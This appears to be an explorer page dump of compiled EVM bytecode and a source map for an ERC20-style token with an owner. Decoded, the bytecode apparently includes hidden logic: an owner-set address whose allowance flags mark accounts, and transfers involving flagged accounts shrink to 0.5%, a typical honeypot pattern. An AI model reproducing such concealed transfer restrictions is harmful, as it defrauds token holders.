ffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610fcb9190611589565b10610fe057610fd982611130565b9050610fe4565b8190505b9392505050565b600160025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20540361112b576002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62030d406103e8836111439190611a9b565b61114d9190611b09565b9050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561118b578082015181840152602081019050611170565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6111b082611154565b6111ba818561115e565b93506111ca81856020860161116e565b6111d381611196565b840191505092915050565b5f6020820190508181035f8301526111f681846111a6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61122f82611206565b9050919050565b61123f81611225565b8114611249575f80fd5b50565b5f8135905061125a81611236565b92915050565b5f819050919050565b61127281611260565b811461127c575f80fd5b50565b5f8135905061128d81611269565b92915050565b5f80604083850312156112a9576112a86111fe565b5b5f6112b68582860161124c565b92505060206112c78582860161127f565b9150509250929050565b5f8115159050919050565b6112e5816112d1565b82525050565b5f6020820190506112fe5f8301846112dc565b92915050565b61130d81611260565b82525050565b5f6020820190506113265f830184611304565b92915050565b5f805f60608486031215611343576113426111fe565b5b5f6113508682870161124c565b93505060206113618682870161124c565b92505060406113728682870161127f565b9150509250925092565b5f60ff82169050919050565b6113918161137c565b82525050565b5f6020820190506113aa5f830184611388565b92915050565b5f602082840312156113c5576113c46111fe565b5b5f6113d28482850161124c565b91505092915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126113fc576113fb6113db565b5b8235905067ffffffffffffffff811115611419576114186113df565b5b602083019150836020820283011115611435576114346113e3565b5b9250929050565b5f805f60408486031215611453576114526111fe565b5b5f84013567ffffffffffffffff8111156114705761146f611202565b5b61147c868287016113e7565b9350935050602061148f8682870161127f565b9150509250925092565b6114a281611225565b82525050565b5f6020820190506114bb5f830184611499565b92915050565b5f80604083850312156114d7576114d66111fe565b5b5f6114e48582860161124c565b92505060206114f58582860161124c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061154357607f821691505b602082108103611556576115556114ff565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61159382611260565b915061159e83611260565b92508282019050808211156115b6576115b561155c565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61164360258361115e565b915061164e826115e9565b604082019050919050565b5f6020820190508181035f83015261167081611637565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6116d160268361115e565b91506116dc82611677565b604082019050919050565b5f6020820190508181035f8301526116fe816116c5565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61175f60248361115e565b915061176a82611705565b604082019050919050565b5f6020820190508181035f83015261178c81611753565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6117ed60228361115e565b91506117f882611793565b604082019050919050565b5f6020820190508181035f83015261181a816117e1565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611855601d8361115e565b915061186082611821565b602082019050919050565b5f6020820190508181035f83015261188281611849565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6118e360258361115e565b91506118ee82611889565b604082019050919050565b5f6020820190508181035f830152611910816118d7565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61197160238361115e565b915061197c82611917565b604082019050919050565b5f6020820190508181035f83015261199e81611965565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6119ff60268361115e565b9150611a0a826119a5565b604082019050919050565b5f6020820190508181035f830152611a2c816119f3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611a6760208361115e565b9150611a7282611a33565b602082019050919050565b5f6020820190508181035f830152611a9481611a5b565b9050919050565b5f611aa582611260565b9150611ab083611260565b9250828202611abe81611260565b91508282048414831517611ad557611ad461155c565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b1382611260565b9150611b1e83611260565b925082611b2e57611b2d611adc565b5b82820490509291505056fea264697066735822122062535bd77b1c7f4e7f58f87c24ce7f7337c0d16eec76404858baec31ed80f5ba64736f6c63430008170033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c80638120649511610095578063a457c2d711610064578063a457c2d7146102ae578063a9059cbb146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b806381206495146102265780638da5cb5b1461025657806394d9c9c71461027457806395d89b4114610290576100fe565b8063313ce567116100d1578063313ce5671461019e57806339509351146101bc57806370a08231146101ec578063715018a61461021c576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806323b872dd1461016e575b5f80fd5b61010a61035a565b60405161011791906111de565b60405180910390f35b61013a60048036038101906101359190611293565b6103ea565b60405161014791906112eb565b60405180910390f35b61015861040c565b6040516101659190611313565b60405180910390f35b6101886004803603810190610183919061132c565b610415565b60405161019591906112eb565b60405180910390f35b6101a6610443565b6040516101b39190611397565b60405180910390f35b6101d660048036038101906101d19190611293565b61044b565b6040516101e391906112eb565b60405180910390f35b610206600480360381019061020191906113b0565b610481565b6040516102139190611313565b60405180910390f35b6102246104c7565b005b610240600480360381019061023b919061143c565b6104da565b60405161024d91906112eb565b60405180910390f35b61025e6105b1565b60405161026b91906114a8565b60405180910390f35b61028e600480360381019061028991906113b0565b6105d8565b005b610298610659565b6040516102a591906111de565b60405180910390f35b6102c860048036038101906102c39190611293565b6106e9565b6040516102d591906112eb565b60405180910390f35b6102f860048036038101906102f39190611293565b61075e565b60405161030591906112eb565b60405180910390f35b610328600480360381019061032391906114c1565b610780565b6040516103359190611313565b60405180910390f35b610358600480360381019061035391906113b0565b610802565b005b6060600480546103699061152c565b80601f01602080910402602001604051908101604052809291908181526020018280546103959061152c565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f4610884565b905061040181858561088b565b600191505092915050565b5f600354905090565b5f8061041f610884565b905061042c858285610a4e565b610437858585610ad9565b60019150509392505050565b5f6012905090565b5f80610455610884565b90506104768185856104678589610780565b6104719190611589565b61088b565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104cf610d4c565b6104d85f610dca565b565b5f806104e4610884565b90505f5b858590508110156105a4578360025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f888885818110610545576105446115bc565b5b905060200201602081019061055a91906113b0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080806001019150506104e8565b5060019150509392505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105e06105b1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610616575f80fd5b8060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6060600580546106689061152c565b80601f01602080910402602001604051908101604052809291908181526020018280546106949061152c565b80156106df5780601f106106b6576101008083540402835291602001916106df565b820191905f5260205f20905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b5f806106f3610884565b90505f6107008286610780565b905083811015610745576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073c90611659565b60405180910390fd5b610752828686840361088b565b60019250505092915050565b5f80610768610884565b9050610775818585610ad9565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61080a610d4c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610878576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086f906116e7565b60405180910390fd5b61088181610dca565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f090611775565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610967576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095e90611803565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a419190611313565b60405180910390a3505050565b5f610a598484610780565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ad35781811015610ac5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abc9061186b565b60405180910390fd5b610ad2848484840361088b565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3e906118f9565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bb5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bac90611987565b60405180910390fd5b5f610bc1848484610e8b565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610c47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3e90611a15565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d329190611313565b60405180910390a3610d45858585610feb565b5050505050565b610d54610884565b73ffffffffffffffffffffffffffffffffffffffff16610d726105b1565b73ffffffffffffffffffffffffffffffffffffffff1614610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf90611a7d565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610fcb9190611589565b10610fe057610fd982611130565b9050610fe4565b8190505b9392505050565b600160025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20540361112b576002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62030d406103e8836111439190611a9b565b61114d9190611b09565b9050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561118b578082015181840152602081019050611170565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6111b082611154565b6111ba818561115e565b93506111ca81856020860161116e565b6111d381611196565b840191505092915050565b5f6020820190508181035f8301526111f681846111a6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61122f82611206565b9050919050565b61123f81611225565b8114611249575f80fd5b50565b5f8135905061125a81611236565b92915050565b5f819050919050565b61127281611260565b811461127c575f80fd5b50565b5f8135905061128d81611269565b92915050565b5f80604083850312156112a9576112a86111fe565b5b5f6112b68582860161124c565b92505060206112c78582860161127f565b9150509250929050565b5f8115159050919050565b6112e5816112d1565b82525050565b5f6020820190506112fe5f8301846112dc565b92915050565b61130d81611260565b82525050565b5f6020820190506113265f830184611304565b92915050565b5f805f60608486031215611343576113426111fe565b5b5f6113508682870161124c565b93505060206113618682870161124c565b92505060406113728682870161127f565b9150509250925092565b5f60ff82169050919050565b6113918161137c565b82525050565b5f6020820190506113aa5f830184611388565b92915050565b5f602082840312156113c5576113c46111fe565b5b5f6113d28482850161124c565b91505092915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126113fc576113fb6113db565b5b8235905067ffffffffffffffff811115611419576114186113df565b5b602083019150836020820283011115611435576114346113e3565b5b9250929050565b5f805f60408486031215611453576114526111fe565b5b5f84013567ffffffffffffffff8111156114705761146f611202565b5b61147c868287016113e7565b9350935050602061148f8682870161127f565b9150509250925092565b6114a281611225565b82525050565b5f6020820190506114bb5f830184611499565b92915050565b5f80604083850312156114d7576114d66111fe565b5b5f6114e48582860161124c565b92505060206114f58582860161124c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061154357607f821691505b602082108103611556576115556114ff565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61159382611260565b915061159e83611260565b92508282019050808211156115b6576115b561155c565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61164360258361115e565b915061164e826115e9565b604082019050919050565b5f6020820190508181035f83015261167081611637565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6116d160268361115e565b91506116dc82611677565b604082019050919050565b5f6020820190508181035f8301526116fe816116c5565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61175f60248361115e565b915061176a82611705565b604082019050919050565b5f6020820190508181035f83015261178c81611753565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6117ed60228361115e565b91506117f882611793565b604082019050919050565b5f6020820190508181035f83015261181a816117e1565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611855601d8361115e565b915061186082611821565b602082019050919050565b5f6020820190508181035f83015261188281611849565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6118e360258361115e565b91506118ee82611889565b604082019050919050565b5f6020820190508181035f830152611910816118d7565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61197160238361115e565b915061197c82611917565b604082019050919050565b5f6020820190508181035f83015261199e81611965565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6119ff60268361115e565b9150611a0a826119a5565b604082019050919050565b5f6020820190508181035f830152611a2c816119f3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611a6760208361115e565b9150611a7282611a33565b602082019050919050565b5f6020820190508181035f830152611a9481611a5b565b9050919050565b5f611aa582611260565b9150611ab083611260565b9250828202611abe81611260565b91508282048414831517611ad557611ad461155c565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b1382611260565b9150611b1e83611260565b925082611b2e57611b2d611adc565b5b82820490509291505056fea264697066735822122062535bd77b1c7f4e7f58f87c24ce7f7337c0d16eec76404858baec31ed80f5ba64736f6c63430008170033

Deployed Bytecode Sourcemap

80:133:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;892:98:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3306:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1984:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4713:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1829:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5394:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2148:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:1;;;:::i;:::-;;3870:281:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1834:85:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2664:127:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1103:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6115:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2469:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2849:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;892:98:2;946:13;978:5;971:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;892:98;:::o;3306:197::-;3389:4;3405:13;3421:12;:10;:12::i;:::-;3405:28;;3443:32;3452:5;3459:7;3468:6;3443:8;:32::i;:::-;3492:4;3485:11;;;3306:197;;;;:::o;1984:106::-;2045:7;2071:12;;2064:19;;1984:106;:::o;4713:286::-;4840:4;4856:15;4874:12;:10;:12::i;:::-;4856:30;;4896:38;4912:4;4918:7;4927:6;4896:15;:38::i;:::-;4944:27;4954:4;4960:2;4964:6;4944:9;:27::i;:::-;4988:4;4981:11;;;4713:286;;;;;:::o;1829:91::-;1887:5;1911:2;1904:9;;1829:91;:::o;5394:234::-;5482:4;5498:13;5514:12;:10;:12::i;:::-;5498:28;;5536:64;5545:5;5552:7;5589:10;5561:25;5571:5;5578:7;5561:9;:25::i;:::-;:38;;;;:::i;:::-;5536:8;:64::i;:::-;5617:4;5610:11;;;5394:234;;;;:::o;2148:125::-;2222:7;2248:9;:18;2258:7;2248:18;;;;;;;;;;;;;;;;2241:25;;2148:125;;;:::o;2457:101:1:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;3870:281:2:-;3959:4;3975:13;3991:12;:10;:12::i;:::-;3975:28;;4018:9;4013:111;4037:8;;:15;;4033:1;:19;4013:111;;;4107:6;4073:11;:18;4085:5;4073:18;;;;;;;;;;;;;;;:31;4092:8;;4101:1;4092:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4073:31;;;;;;;;;;;;;;;:40;;;;4054:3;;;;;;;4013:111;;;;4140:4;4133:11;;;3870:281;;;;;:::o;1834:85:1:-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;2664:127:2:-;2745:7;:5;:7::i;:::-;2731:21;;:10;:21;;;2722:32;;;;;;2776:8;2764:9;;:20;;;;;;;;;;;;;;;;;;2664:127;:::o;1103:102::-;1159:13;1191:7;1184:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1103:102;:::o;6115:427::-;6208:4;6224:13;6240:12;:10;:12::i;:::-;6224:28;;6262:24;6289:25;6299:5;6306:7;6289:9;:25::i;:::-;6262:52;;6352:15;6332:16;:35;;6324:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6443:60;6452:5;6459:7;6487:15;6468:16;:34;6443:8;:60::i;:::-;6531:4;6524:11;;;;6115:427;;;;:::o;2469:189::-;2548:4;2564:13;2580:12;:10;:12::i;:::-;2564:28;;2602;2612:5;2619:2;2623:6;2602:9;:28::i;:::-;2647:4;2640:11;;;2469:189;;;;:::o;2849:149::-;2938:7;2964:11;:18;2976:5;2964:18;;;;;;;;;;;;;;;:27;2983:7;2964:27;;;;;;;;;;;;;;;;2957:34;;2849:149;;;;:::o;2707:198:1:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;10143:370:2:-;10291:1;10274:19;;:5;:19;;;10266:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10371:1;10352:21;;:7;:21;;;10344:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10453:6;10423:11;:18;10435:5;10423:18;;;;;;;;;;;;;;;:27;10442:7;10423:27;;;;;;;;;;;;;;;:36;;;;10490:7;10474:32;;10483:5;10474:32;;;10499:6;10474:32;;;;;;:::i;:::-;;;;;;;;10143:370;;;:::o;10794:441::-;10924:24;10951:25;10961:5;10968:7;10951:9;:25::i;:::-;10924:52;;11010:17;10990:16;:37;10986:243;;11071:6;11051:16;:26;;11043:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11153:51;11162:5;11169:7;11197:6;11178:16;:25;11153:8;:51::i;:::-;10986:243;10914:321;10794:441;;;:::o;6995:837::-;7137:1;7121:18;;:4;:18;;;7113:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7213:1;7199:16;;:2;:16;;;7191:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;7266:15;7284:38;7305:4;7311:2;7315:6;7284:20;:38::i;:::-;7266:56;;7333:19;7355:9;:15;7365:4;7355:15;;;;;;;;;;;;;;;;7333:37;;7403:6;7388:11;:21;;7380:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;7518:6;7504:11;:20;7486:9;:15;7496:4;7486:15;;;;;;;;;;;;;;;:38;;;;7718:7;7701:9;:13;7711:2;7701:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;7766:2;7751:26;;7760:4;7751:26;;;7770:6;7751:26;;;;;;:::i;:::-;;;;;;;;7788:37;7808:4;7814:2;7818:6;7788:19;:37::i;:::-;7103:729;;6995:837;;;:::o;1992:130:1:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;12601:315:2:-;12726:7;12810:1;12780:11;:22;12792:9;;;;;;;;;;;12780:22;;;;;;;;;;;;;;;:26;12803:2;12780:26;;;;;;;;;;;;;;;;12749:11;:22;12761:9;;;;;;;;;;;12749:22;;;;;;;;;;;;;;;:28;12772:4;12749:28;;;;;;;;;;;;;;;;:57;;;;:::i;:::-;:62;12745:165;;12834:21;12848:6;12834:13;:21::i;:::-;12827:28;;;;12745:165;12893:6;12886:13;;12601:315;;;;;;:::o;11823:194::-;11975:1;11945:11;:22;11957:9;;;;;;;;;;;11945:22;;;;;;;;;;;;;;;:26;11968:2;11945:26;;;;;;;;;;;;;;;;:31;11941:70;;12008:1;11979:11;:22;11991:9;;;;;;;;;;;11979:22;;;;;;;;;;;;;;;:26;12002:2;11979:26;;;;;;;;;;;;;;;:30;;;;11941:70;11823:194;;;:::o;9628:92::-;9684:7;9712:6;9705:4;9701:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;9694:24;;9628:92;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-